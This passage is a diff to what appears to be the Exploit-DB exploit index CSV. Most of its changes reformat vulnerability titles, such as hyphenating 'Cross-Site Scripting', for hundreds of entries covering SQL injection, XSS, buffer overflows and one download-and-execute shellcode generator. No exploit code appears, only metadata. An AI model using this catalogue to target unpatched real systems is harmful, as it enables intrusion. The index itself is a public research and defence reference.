'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 -36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 +36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 -36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 -36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 -36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Inclusion",2011-08-15,muuratsalo,php,webapps,0 +36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 +36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 +36047,platforms/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusion",2011-08-15,muuratsalo,php,webapps,0 36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps,0 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote,0 -36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 -36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (2)",2015-02-11,"dogo h@ck",windows,local,0 36054,platforms/php/webapps/36054.txt,"WordPress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 -36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 +36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 -36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 -36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 Cross Site Scripting and SQL Injection",2011-08-18,Net.Edit0r,php,webapps,0 +36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 +36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 Cross-Site Scripting and SQL Injection",2011-08-18,Net.Edit0r,php,webapps,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 -36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 -36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 +36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 +36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross-Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 -36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 -36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 +36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 +36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command",2015-02-14,R-73eN,windows,remote,0 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 @@ -32524,19 +32524,19 @@ id,file,description,date,author,platform,type,port 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 -36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0 +36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / XSS",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"Fancybox for WordPress 3.0.2 - Stored XSS",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service and CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0 -36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0 +36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0 36092,platforms/windows/dos/36092.pl,"MapServer 6.0 Map File Double Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps,0 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Inclusion and SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0 36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 -36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 +36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 & 5.00.10 Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 -36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 +36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 - Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,Metasploit,windows,remote,0 36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,Metasploit,java,remote,1617 36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 @@ -32547,44 +32547,44 @@ id,file,description,date,author,platform,type,port 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross Site Scripting",2011-09-02,T0xic,php,webapps,0 +36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 -36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 +36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 -36116,platforms/asp/webapps/36116.txt,"Kisanji 'gr' Parameter Cross Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 -36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 +36116,platforms/asp/webapps/36116.txt,"Kisanji 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 +36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x Multiple Cross-Site Scripting and SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 -36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 -36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross Site Scripting",2011-09-08,sonyy,php,webapps,0 +36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 +36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross-Site Scripting",2011-09-08,sonyy,php,webapps,0 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 36128,platforms/windows/dos/36128.txt,"Wireshark 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,windows,dos,0 -36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Inclusion and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 +36129,platforms/php/webapps/36129.txt,"Pluck 4.7 - Multiple Local File Inclusion and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection",2011-09-09,"David Mas",multiple,remote,0 -36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 +36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0 -36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 +36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,php,webapps,0 -36137,platforms/php/webapps/36137.txt,"PunBB 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 +36137,platforms/php/webapps/36137.txt,"PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injection",2011-09-17,m3rciL3Ss,asp,webapps,0 -36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps,0 -36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 -36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps,0 +36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 +36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 -36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection",2011-09-19,Net.Edit0r,php,webapps,0 +36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injection",2011-09-19,Net.Edit0r,php,webapps,0 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 -36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 -36147,platforms/php/webapps/36147.txt,"Free Help Desk 1.1b Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",php,webapps,0 -36148,platforms/php/webapps/36148.txt,"phpRS 2.8.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-18,iM4n,php,webapps,0 -36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 Multiple SQL Injection",2011-09-21,"kurdish hackers team",php,webapps,0 -36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 +36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 +36147,platforms/php/webapps/36147.txt,"Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",php,webapps,0 +36148,platforms/php/webapps/36148.txt,"phpRS 2.8.1 - Multiple SQL Injection / Cross-Site Scripting",2011-09-18,iM4n,php,webapps,0 +36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 - Multiple SQL Injection",2011-09-21,"kurdish hackers team",php,webapps,0 +36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0 36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,Metasploit,multiple,remote,3465 @@ -32601,34 +32601,34 @@ id,file,description,date,author,platform,type,port 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10_ WordPress 3.1.x_ DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 -36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 -36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 +36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 +36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 -36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 +36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 36173,platforms/php/webapps/36173.txt,"Vanira CMS 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0 -36175,platforms/php/webapps/36175.txt,"Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-28,"High-Tech Bridge SA",php,webapps,0 -36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 -36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0 -36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36179,platforms/php/webapps/36179.txt,"WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36180,platforms/php/webapps/36180.txt,"WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36181,platforms/php/webapps/36181.txt,"WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36182,platforms/php/webapps/36182.txt,"WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36183,platforms/php/webapps/36183.txt,"WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross Site Scripting",2011-09-24,jabdah,php,webapps,0 -36184,platforms/php/webapps/36184.txt,"WordPress Web Minimalist Theme 1.1 - 'index.php' Cross Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 - 'index.php' Cross Site Scripting",2011-09-30,SiteWatch,php,webapps,0 -36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injection / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0 +36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 +36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0 +36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36179,platforms/php/webapps/36179.txt,"WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36180,platforms/php/webapps/36180.txt,"WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36181,platforms/php/webapps/36181.txt,"WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36182,platforms/php/webapps/36182.txt,"WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36183,platforms/php/webapps/36183.txt,"WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 +36184,platforms/php/webapps/36184.txt,"WordPress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0 36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption PoC",2015-02-26,"Andras Kabai",linux,dos,0 -36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 - 's' Parameter Cross Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure",2011-09-28,St493r,php,webapps,0 36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 -36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 - 'cpage' Parameter Cross Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 